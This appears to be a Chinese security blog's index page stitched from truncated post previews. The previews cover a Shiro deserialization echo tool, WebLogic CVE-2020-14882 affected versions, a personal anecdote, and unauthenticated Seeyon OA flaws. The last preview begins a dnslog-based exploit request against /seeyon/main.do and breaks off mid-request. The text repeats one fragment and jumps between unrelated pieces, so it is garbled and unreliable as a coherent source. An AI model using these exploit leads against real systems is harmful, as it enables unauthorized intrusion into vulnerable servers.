Shiro反序列化无文件回显
今天突然看到一个项目发现很不错。https://github.com/j1anFen/ysoserial_echo支持:ApereoCAS4.1.X默认密钥Shirospring环境下回显Liferayprotal7.0以上本地复现环境Vulhub环境搭建git下来后,直接在ysoserial_ec
今天突然看到一个项目发现很不错。https://github.com/j1anFen/ysoserial_echo支持:ApereoCAS4.1.X默认密钥Shirospring环境下回显Liferayprotal7.0以上本地复现环境Vulhub环境搭建git下来后,直接在ysoserial_ec
影响版本WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.1.4.0WebLogic 14.1.1.0.0需要出网环境配合cve-2020-14882 POC 同样可以配合cve-2020-14750绕过进控
最近跟高中同学吃饭,偶然听到他前不久去拜访过我们的高中老师。然后老师还特意问起了我现在在干嘛什么的,老师说她收到过一份感谢信,感谢培养出这么优秀的人七七八八的。让我有些吃惊,我感觉应该是大学或者哪场HVV比赛发的吧,但是还是让我有些小欣喜!让别人能为你骄傲其实这也能成为让我不断努力学习的动力,最近有
这个POC很早有人放出来了,但是大HW被人提交成了0day。其实19年htmlofficeservlet出来的时候,就肯定有人去分析了那几个接口。主要写在WEB.XML里面的servlet就那几个,但是其实这三个只是可以未授权访问,但是除了htmlofficeservlet以外,其他两个都需要认证后
一个是需要认证的任意文件上传,并且还有个编码问题。今天重新看了下,发现还真有个无需认证的。日,太傻了。
1.打开http://www.dnslog.cn/点击GetSubDomain按钮后,下方会出现一个域名。2.复制域名,在下方代码中替换。POST/seeyon/main.do?method=changeLocaleHTTP/1.1Host:xxx.xxx.xxx.xxxContent-Length